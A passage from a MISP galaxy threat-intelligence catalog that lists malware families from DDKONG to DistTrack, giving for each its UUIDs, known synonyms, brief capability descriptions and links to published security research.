UUID cae8384d-b01b-4f9c-a31b-f693e12ea6b2
which can be used as unique global reference for DDKONG
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.ddkong - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-overbrook - webarchive
- https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/ - webarchive
- https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html - webarchive
- https://unit42.paloaltonetworks.com/atoms/rancortaurus/ - webarchive
- https://unit42.paloaltonetworks.com/rancor-cyber-espionage-group-uses-new-custom-malware-to-attack-southeast-asia/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DEADWOOD
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DEADWOOD.
Known Synonyms |
---|
Agrius |
DETBOSIT |
SQLShred |
Internal MISP references
UUID b3ce3d4d-f115-4bd0-8d30-2b63e060b286
which can be used as unique global reference for DEADWOOD
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.deadwood - webarchive
- https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/ - webarchive
- https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/ - webarchive
- https://www.welivesecurity.com/2022/12/07/fantasy-new-agrius-wiper-supply-chain-attack/ - webarchive
- https://www.sentinelone.com/wp-content/uploads/2021/05/SentinelLabs_From-Wiper-to-Ransomware-The-Evolution-of-Agrius.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DealPly
Internal MISP references
UUID 4f32b912-59a9-4dae-9118-28d78e01fbfc
which can be used as unique global reference for DealPly
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.dealply - webarchive
- https://www.catonetworks.com/blog/the-dga-algorithm-used-by-dealply-and-bujo/ - webarchive
- https://kienmanowar.wordpress.com/2021/05/11/quick-analysis-note-about-dealply-adware/ - webarchive
- https://securelist.com/threat-in-your-browser-extensions/107181 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
dearcry
According to PCrisk, DearCry ransomware has been observed infecting systems via ProxyLogon vulnerabilities of Microsoft Exchange servers - mail and calendaring servers developed by Microsoft. While a patch has been released addressing these vulnerabilities, thousands of Microsoft Exchange servers remained unpatched at the time of research.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular dearcry.
Known Synonyms |
---|
DoejoCrypt |
Internal MISP references
UUID 793f0f9d-fc1c-43e1-9010-2052a1cf696d
which can be used as unique global reference for dearcry
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.dearcry - webarchive
- https://lifars.com/wp-content/uploads/2021/04/DearCry_Ransomware.pdf - webarchive
- https://us-cert.cisa.gov/ncas/analysis-reports/ar21-102b - webarchive
- https://www.youtube.com/watch?v=qmCjtigVVR0 - webarchive
- https://news.sophos.com/en-us/2021/03/15/dearcry-ransomware-attacks-exploit-exchange-server-vulnerabilities/ - webarchive
- https://www.youtube.com/watch?v=Hhx9Q2i7zGo - webarchive
- https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/ - webarchive
- https://www.youtube.com/watch?v=MRTdGUy1lfw - webarchive
- https://www.advanced-intel.com/post/adversarial-perspective-advintel-breach-avoidance-through-monitoring-initial-vulnerabilities - webarchive
- https://www.youtube.com/watch?v=6lSfxsrs61s&t=5s - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DeathRansom
Also known as Wacatac ransomware due to its .wctc extension.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DeathRansom.
Known Synonyms |
---|
deathransom |
wacatac |
Internal MISP references
UUID 2bc6623a-d7d6-48fc-af79-647648f455aa
which can be used as unique global reference for DeathRansom
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.deathransom - webarchive
- https://id-ransomware.blogspot.com/2019/11/wacatac-ransomware.html - webarchive
- https://dissectingmalwa.re/quick-and-painless-reversing-deathransom-wacatac.html - webarchive
- https://github.com/albertzsigovits/malware-notes/blob/master/DeathRansom.md - webarchive
- https://www.fortinet.com/blog/threat-research/death-ransom-new-strain-ransomware.html - webarchive
- https://blog.cyber5w.com/the-most-known-unpacking-technique - webarchive
- https://twitter.com/Amigo_A_/status/1196898012645220354 - webarchive
- https://www.fortinet.com/blog/threat-research/death-ransom-attribution.html - webarchive
- https://asec.ahnlab.com/1269 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DECAF
Ransomware written in Go.
Internal MISP references
UUID c70e97ea-73bb-4342-a8cd-6cbe0e589bec
which can be used as unique global reference for DECAF
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Decebal
Internal MISP references
UUID fba088fb-2659-48c3-921b-12c6791e6d58
which can be used as unique global reference for Decebal
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DeepCreep
Internal MISP references
UUID a29e21f9-b193-4369-8351-95860d56de03
which can be used as unique global reference for DeepCreep
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DeepRAT
Internal MISP references
UUID 355ace5a-ae57-45b8-b49d-e3286c4c18cc
which can be used as unique global reference for DeepRAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Defray
Defray is targeted ransomware that appeared in 2017, aimed mainly at the healthcare vertical.
The distribution of Defray has several notable characteristics. According to Proofpoint:
"Defray is currently being spread via Microsoft Word document attachments in email.
The campaigns are as small as several messages each.
The lures are custom crafted to appeal to the intended set of potential victims.
The recipients are individuals or distribution lists, e.g., group@ and websupport@.
Geographic targeting is in the UK and US.
Vertical targeting varies by campaign and is narrow and selective."
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Defray.
Known Synonyms |
---|
Glushkov |
Internal MISP references
UUID bbc6dbe3-0ade-4b80-a1cb-c19e23ea8b88
which can be used as unique global reference for Defray
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.defray - webarchive
- https://www.bleepingcomputer.com/news/security/government-software-provider-tyler-technologies-hit-by-ransomware/ - webarchive
- https://www.trendmicro.com/en_us/research/20/k/weaponizing-open-source-software-for-targeted-attacks.html - webarchive
- https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/ - webarchive
- https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/5/ - webarchive
- https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/3 - webarchive
- https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf - webarchive
- https://www.proofpoint.com/us/threat-insight/post/defray-new-ransomware-targeting-education-and-healthcare-verticals - webarchive
- https://threatvector.cylance.com/en_us/home/threat-spotlight-defray-ransomware-hits-healthcare-and-education.html - webarchive
- https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/4 - webarchive
- https://www.secureworks.com/research/threat-profiles/gold-dupont - webarchive
- https://www.youtube.com/watch?v=LUxOcpIRxmg - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/new-defray-ransomware-targets-education-and-healthcare-verticals - webarchive
- https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/2/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Deimos
Described by Elastic as being associated with win.jupyter, and being used in the context of initial access, persistence, and C&C capabilities.
Internal MISP references
UUID e369e45e-0e92-4811-822e-5e598285465e
which can be used as unique global reference for Deimos
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DeimosC2
Trend Micro describes DeimosC2 as an open-source C&C framework that was released in June 2020. It is a fully functional framework that allows multiple attackers to access, create payloads for, and interact with victim computers. As a post-exploitation C&C framework, DeimosC2 generates the payloads that need to be manually executed on computer servers that have been compromised through other means such as social engineering, exploitation, or brute-force attacks. Once it is deployed, the threat actors gain the same access to the systems as the user account that the payload was executed as, either as an administrator or a regular user. Note that DeimosC2 does not perform active or privilege escalation of any kind.
Internal MISP references
UUID 1f1a894f-7a1b-4b98-9280-d33cf884a539
which can be used as unique global reference for DeimosC2
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.deimos_c2 - webarchive
- https://5851803.fs1.hubspotusercontent-na1.net/hubfs/5851803/Russian%20Ransomware%20C2%20Network%20Discovered%20in%20Censys%20Data.pdf - webarchive
- https://www.trendmicro.com/en_us/research/22/k/deimosc2-what-soc-analysts-and-incident-responders-need-to-know.html - webarchive
- https://censys.com/russian-ransomware-c2-network-discovered-in-censys-data/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DeliveryCheck
According to CERT-UA, this malware makes use of XSLT (Extensible Stylesheet Language Transformations) and COM hijacking. Its distinctive feature is a server-side component, which is usually installed on compromised MS Exchange servers in the form of a MOF (Managed Object Format) file using the Desired State Configuration (DSC) PowerShell tool, effectively turning a legitimate server into a malware control center.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DeliveryCheck.
Known Synonyms |
---|
CAPIBAR |
GAMEDAY |
Internal MISP references
UUID 73ef709e-c88d-4737-a3fb-81d7ece5c97d
which can be used as unique global reference for DeliveryCheck
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Delta(Alfa,Bravo, ...)
Internal MISP references
UUID 0be67307-670d-4558-bcf7-1387047bca4b
which can be used as unique global reference for Delta(Alfa,Bravo, ...)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DeltaStealer
Rust-based infostealer.
Internal MISP references
UUID 3b38cd03-a387-43ce-b8d9-c337d51a84d0
which can be used as unique global reference for DeltaStealer
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Dented
Dented is a banking bot written in C. It supports IE, Firefox, Chrome, Opera and Edge and comes with a simple POS grabber. Due to its modularity, reverse SOCKS5, Tor and VNC modules can be added.
Internal MISP references
UUID 0404cb3e-1390-4010-a368-80ee585ddd59
which can be used as unique global reference for Dented
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Deprimon
According to ESET Research, DePriMon is a malicious downloader with several stages that uses many non-traditional techniques. To achieve persistence, the malware registers a new local port monitor, a trick falling under the "Port Monitors" technique in the MITRE ATT&CK knowledge base. For that, the malware uses the "Windows Default Print Monitor" name; that's why we have named it DePriMon. Due to its complexity and modular architecture, researchers believe it to be a framework.
DePriMon has been active since at least March 2017. DePriMon was detected in a private company based in Central Europe, and on dozens of computers in the Middle East.
Internal MISP references
UUID 17429ed4-6106-4a28-9a76-f19cd476d94b
which can be used as unique global reference for Deprimon
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DeputyDog
Internal MISP references
UUID ff4254e5-f301-4804-9a0f-e010af56576c
which can be used as unique global reference for DeputyDog
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.deputydog - webarchive
- https://www.fireeye.com/blog/threat-research/2013/09/operation-deputydog-zero-day-cve-2013-3893-attack-against-japanese-targets.html - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-keystone - webarchive
- https://web.archive.org/web/20130924130243/https://www.fireeye.com/blog/technical/cyber-exploits/2013/09/operation-deputydog-zero-day-cve-2013-3893-attack-against-japanese-targets.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DeriaLock
Internal MISP references
UUID 52e0bcba-e352-4d7b-82ee-9169f18dca5a
which can be used as unique global reference for DeriaLock
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DeroHE
DeroHE is ransomware that was spread to users after IObit, a Windows utility developer, was hacked. The malware is delivered as a DLL that is sideloaded by a legitimate, signed IObit License Manager application.
Internal MISP references
UUID d348373e-df43-4916-ac23-4f6e344c59e1
which can be used as unique global reference for DeroHE
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Derusbi (Windows)
A DLL backdoor also reported publicly as "Derusbi", capable of obtaining directory, file, and drive listings; creating a reverse shell; performing screen captures; recording video and audio; listing, terminating, and creating processes; enumerating, starting, and deleting registry keys and values; logging keystrokes; returning usernames and passwords from protected storage; and renaming, deleting, copying, moving, reading, and writing files.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Derusbi (Windows).
Known Synonyms |
---|
PHOTO |
Internal MISP references
UUID 7ea00126-add3-407e-b69d-d4aa1b3049d5
which can be used as unique global reference for Derusbi (Windows)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.derusbi - webarchive
- https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf - webarchive
- https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-keystone - webarchive
- https://attack.mitre.org/groups/G0096 - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-firestone - webarchive
- https://www.rsa.com/content/dam/en/white-paper/rsa-incident-response-emerging-threat-profile-shell-crew.pdf - webarchive
- https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/ - webarchive
- https://www.trendmicro.com/en_us/research/21/g/biopass-rat-new-malware-sniffs-victims-via-live-streaming.html - webarchive
- https://www.youtube.com/watch?v=YCwyc6SctYs - webarchive
- https://unit42.paloaltonetworks.com/rancor-cyber-espionage-group-uses-new-custom-malware-to-attack-southeast-asia/ - webarchive
- https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf - webarchive
- https://web.archive.org/web/20180310053107/https://www.rsaconference.com/writable/presentations/file_upload/hta-w02-dissecting-derusbi.pdf - webarchive
- http://www.novetta.com/wp-content/uploads/2014/11/Derusbi.pdf - webarchive
- https://attack.mitre.org/groups/G0001/ - webarchive
- https://www.virusbulletin.com/uploads/pdf/conference_slides/2015/Pun-etal-VB2015.pdf - webarchive
- https://web.archive.org/web/20151216071054/http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-mohawk - webarchive
- https://cybergeeks.tech/analyzing-apt19-malware-using-a-step-by-step-method/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DesertBlade
According to Microsoft, this was used in a limited destructive malware attack in early March 2022 impacting a single Ukrainian entity. DesertBlade is responsible for iteratively overwriting and then deleting overwritten files on all accessible drives (sparing the system if it is a domain controller).
Internal MISP references
UUID 9a23d11d-1a32-47c8-a35e-accb88a2a370
which can be used as unique global reference for DesertBlade
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.desertblade - webarchive
- https://www.youtube.com/watch?v=mrTdSdMMgnk - webarchive
- https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf - webarchive
- https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Devil's Rat
Internal MISP references
UUID 44168d77-338d-46ad-a5f6-c17c2b6b0631
which can be used as unique global reference for Devil's Rat
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DevOpt
Internal MISP references
UUID 7d7a870d-725f-4ea3-b344-9c1ad0500618
which can be used as unique global reference for DevOpt
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Dexbia
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Dexbia.
Known Synonyms |
---|
CONIME |
Internal MISP references
UUID 4792fe0d-5c2f-44b1-861a-4b0501ccd335
which can be used as unique global reference for Dexbia
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Dexphot
Dexphot is cryptominer malware that attacks Windows machines to profit from their computing resources. It implements many techniques to evade common security products and uses fileless techniques to inject its malicious behavior into other processes. According to Microsoft, Dexphot hijacks legitimate system processes to disguise malicious activity. If not stopped, Dexphot relies on monitoring services and scheduled tasks that trigger re-infection when defenders attempt to remove the malware.
Internal MISP references
UUID b9f6de53-13b3-4246-96d5-010851c75bdb
which can be used as unique global reference for Dexphot
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Dexter
Dexter is a computer virus, or point-of-sale malware, that infects computers running Microsoft Windows; it was discovered by the IT security firm Seculert in December 2012. It infects PoS systems worldwide and steals sensitive information such as credit card and debit card data.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Dexter.
Known Synonyms |
---|
LusyPOS |
Internal MISP references
UUID f44e6d03-54c0-47af-b228-0040299c349c
which can be used as unique global reference for Dexter
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.dexter - webarchive
- https://securitykitten.github.io/2014/12/01/lusypos-and-tor.html - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/infostealer-dexter-targets-checkout-systems/ - webarchive
- http://contagiodump.blogspot.com/2012/12/dexter-pos-infostealer-samples-and.html - webarchive
- https://www.trustwave.com/Resources/SpiderLabs-Blog/The-Dexter-Malware--Getting-Your-Hands-Dirty/ - webarchive
- https://volatility-labs.blogspot.com/2012/12/unpacking-dexter-pos-memory-dump.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Dharma
According to MalwareBytes, the Dharma Ransomware family is installed manually by attackers hacking into computers over Remote Desktop Protocol Services (RDP). The attackers will scan the Internet for computers running RDP, usually on TCP port 3389, and then attempt to brute force the password for the computer.
Once they gain access to the computer they will install the ransomware and let it encrypt the computer. If the attackers are able to encrypt other computers on the network, they will attempt to do so as well.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Dharma.
Known Synonyms |
---|
Arena |
Crysis |
Wadhrama |
ncov |
Internal MISP references
UUID 9c90b876-e94d-4ea5-9f30-fdc6dd6b5aef
which can be used as unique global reference for Dharma
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.dharma - webarchive
- https://www.crowdstrike.com/blog/ransomware-preparedness-a-call-to-action/ - webarchive
- https://services.google.com/fh/files/blogs/google_fog_of_war_research_report.pdf - webarchive
- https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf - webarchive
- https://twitter.com/JakubKroustek/status/1087808550309675009 - webarchive
- https://securelist.com/cis-ransomware/104452/ - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf - webarchive
- https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/ - webarchive
- https://www.youtube.com/watch?v=LUxOcpIRxmg - webarchive
- https://www.group-ib.com/media/iran-cybercriminals/ - webarchive
- https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-transnaczionalne-zlochinne-ugrupovannya-u-nanesenni-inozemnim-kompaniyam-120-miljoniv-dolariv-zbitkiv/ - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf - webarchive
- https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf - webarchive
- https://news.sophos.com/en-us/2020/08/12/color-by-numbers-inside-a-dharma-ransomware-as-a-service-attack/ - webarchive
- https://thedfirreport.com/2020/06/16/the-little-ransomware-that-couldnt-dharma/ - webarchive
- https://www.acronis.com/en-us/articles/Dharma-ransomware/ - webarchive
- https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/ - webarchive
- https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-april-1st-2022-i-can-fight-with-a-keyboard/ - webarchive
- https://www.bleepingcomputer.com/news/security/new-arena-crysis-ransomware-variant-released/ - webarchive
- https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023 - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf - webarchive
- https://www.vice.com/en/article/wxqz54/secret-service-network-investigative-technique-ransomware - webarchive
- https://www.carbonblack.com/2018/07/10/carbon-black-tau-threat-analysis-recent-dharma-ransomware-highlights-attackers-continued-use-open-source-tools/ - webarchive
- https://www.justice.gov/usao-dc/press-release/file/1021186/download - webarchive
- https://docs.microsoft.com/en-us/security/compass/human-operated-ransomware - webarchive
- https://asec.ahnlab.com/en/54937/ - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/negasteal-uses-hastebin-for-fileless-delivery-of-crysis-ransomware - webarchive
- https://www.zscaler.com/blogs/security-research/ransomware-delivered-using-rdp-brute-force-attack - webarchive
- https://s3.documentcloud.org/documents/6986753/Secret-Service-Seattle-NIT-Warrant-Application.pdf - webarchive
- https://www.theregister.com/2019/11/11/dharma_decryption_promises_data_recovery/ - webarchive
- http://web.archive.org/web/20191008053714/http://esec-lab.sogeti.com/posts/2016/06/07/the-story-of-yet-another-ransomfailware.html - webarchive
- https://nakedsecurity.sophos.com/2018/09/11/the-rise-of-targeted-ransomware/ - webarchive
- https://research.checkpoint.com/2018/the-ransomware-doctor-without-a-cure/ - webarchive
- https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware - webarchive
- https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox - webarchive
- https://www.europol.europa.eu/newsroom/news/12-targeted-for-involvement-in-ransomware-attacks-against-critical-infrastructure - webarchive
- https://cyberveille-sante.gouv.fr/cyberveille-sante/1821-france-retour-dexperience-suite-une-attaque-par-rancongiciel-contre-une - webarchive
- https://www.advanced-intel.com/post/inside-phobos-ransomware-dharma-past-underground - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/dharma-ransomware-uses-av-tool-to-distract-from-malicious-activities/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DiamondFox
According to PCrisk, DiamondFox is highly modular malware offered as malware-as-a-service, and is for sale on various hacker forums. Therefore, cyber criminals who are willing to use DiamondFox do not necessarily require any technical knowledge to perform their attacks.
Once purchased, this malware can be used to log keystrokes, steal credentials (e.g., usernames, email addresses, passwords), hijack cryptocurrency wallets, perform distributed denial of service (DDoS) attacks, and to carry out other malicious tasks.
DiamondFox allows cyber criminals to choose which plug-ins to keep activated and see infection statistics in real-time.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DiamondFox.
Known Synonyms |
---|
Crystal |
Gorynch |
Gorynych |
Internal MISP references
UUID 7368ab0c-ef4b-4f53-a746-f150b8afa665
which can be used as unique global reference for DiamondFox
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.diamondfox - webarchive
- https://github.com/samoceyn/Diamondfox-Technical-Analysis-Report/blob/6375314ccecdf3fe450f975a384bcc1b16f068a8/D%C4%B0AMONDFOX%20Technical%20Analysis%20Report.PDF - webarchive
- http://blog.checkpoint.com/2017/05/10/diamondfox-modular-malware-one-stop-shop/ - webarchive
- https://blog.malwarebytes.com/threat-analysis/2017/03/diamond-fox-p1/ - webarchive
- https://fr3d.hk/blog/diamondfox-bank-robbers-will-be-replaced - webarchive
- https://www.scmagazine.com/inside-diamondfox/article/578478/ - webarchive
- https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145 - webarchive
- https://blog.malwarebytes.com/threat-analysis/2017/04/diamond-fox-p2/ - webarchive
- https://blog.cylance.com/a-study-in-bots-diamondfox - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Diavol
A ransomware with potential ties to Wizard Spider.
Internal MISP references
UUID 6fa944af-3def-437a-8a52-9234782b5bb8
which can be used as unique global reference for Diavol
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.diavol - webarchive
- https://www.scythe.io/library/adversary-emulation-diavol-ransomware-threatthursday - webarchive
- https://arcticwolf.com/resources/blog/karakurt-web - webarchive
- https://thedfirreport.com/2021/12/13/diavol-ransomware/ - webarchive
- https://heimdalsecurity.com/blog/is-diavol-ransomware-connected-to-wizard-spider/ - webarchive
- https://www.bleepingcomputer.com/news/security/trickbot-gang-developer-arrested-when-trying-to-leave-korea/ - webarchive
- https://www.ic3.gov/Media/News/2022/220120.pdf - webarchive
- https://securityintelligence.com/posts/analysis-of-diavol-ransomware-link-trickbot-gang/ - webarchive
- https://www.binarydefense.com/threat_watch/new-ransomware-diavol-being-dropped-by-trickbot/ - webarchive
- https://www.bleepingcomputer.com/news/security/diavol-ransomware-sample-shows-stronger-connection-to-trickbot-gang/ - webarchive
- https://www.bleepingcomputer.com/news/security/fbi-links-diavol-ransomware-to-the-trickbot-cybercrime-group/ - webarchive
- https://medium.com/walmartglobaltech/diavol-the-enigma-of-ransomware-1fd78ffda648 - webarchive
- https://medium.com/walmartglobaltech/diavol-resurfaces-91dd93c7d922 - webarchive
- https://chuongdong.com/reverse%20engineering/2021/12/17/DiavolRansomware/ - webarchive
- https://www.fortinet.com/blog/threat-research/diavol-new-ransomware-used-by-wizard-spider - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DICELOADER
A RAT written in .NET, used by FIN7 since 2021. In some instances dropped by ps1.powertrash.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DICELOADER.
Known Synonyms |
---|
Lizar |
Internal MISP references
UUID f8e7673a-c8dc-406a-851e-48756074b5c6
which can be used as unique global reference for DICELOADER
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.diceloader - webarchive
- https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/ - webarchive
- https://www.mandiant.com/resources/blog/evolution-of-fin7 - webarchive
- https://bi-zone.medium.com/from-pentest-to-apt-attack-cybercriminal-group-fin7-disguises-its-malware-as-an-ethical-hackers-c23c9a75e319 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DILLJUICE
APT10's fork of the (open-source) Quasar RAT.
Internal MISP references
UUID 81c95462-62ba-4182-bba0-707e1f6cc1eb
which can be used as unique global reference for DILLJUICE
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DilongTrash
Downloader.
Internal MISP references
UUID 8d910ebf-131b-452c-8cc2-0226887259a0
which can be used as unique global reference for DilongTrash
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Dimnie
Internal MISP references
UUID 8f5ce8a6-c5fe-4c62-b25b-6ce0f3b724c5
which can be used as unique global reference for Dimnie
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DinodasRAT
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DinodasRAT.
Known Synonyms |
---|
XDealer |
Internal MISP references
UUID a8eaa325-3e89-41af-9de0-ae2c992148a5
which can be used as unique global reference for DinodasRAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DinoTrain
Downloader.
Internal MISP references
UUID 8f4c0f4a-4b3f-4bce-be08-fabf4ec45399
which can be used as unique global reference for DinoTrain
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DirCrypt
Internal MISP references
UUID 61b2dd12-2381-429d-bb64-e3210804a462
which can be used as unique global reference for DirCrypt
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DirtyMoe
Internal MISP references
UUID 9f324aaf-a54e-4532-bfc1-b23f1a77abbf
which can be used as unique global reference for DirtyMoe
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.dirtymoe - webarchive
- https://decoded.avast.io/martinchlumecky/dirtymoe-3/ - webarchive
- https://thehackernews.com/2022/03/purple-fox-hackers-spotted-using-new.html - webarchive
- https://decoded.avast.io/martinchlumecky/dirtymoe-4/ - webarchive
- https://decoded.avast.io/martinchlumecky/dirtymoe-1/ - webarchive
- https://decoded.avast.io/martinchlumecky/dirtymoe-rootkit-driver/ - webarchive
- https://decoded.avast.io/martinchlumecky/dirtymoe-5/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Disk Knight
Internal MISP references
UUID 1e5d8ec2-e609-482d-93ef-8a0ab74b3da5
which can be used as unique global reference for Disk Knight
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DispCashBR
Internal MISP references
UUID 9e343fd7-3809-49af-9903-db7daeac339b
which can be used as unique global reference for DispCashBR
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DispenserXFS
Internal MISP references
UUID 3bbf08fd-f147-4b23-9d48-a53ac836bc05
which can be used as unique global reference for DispenserXFS
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DistTrack
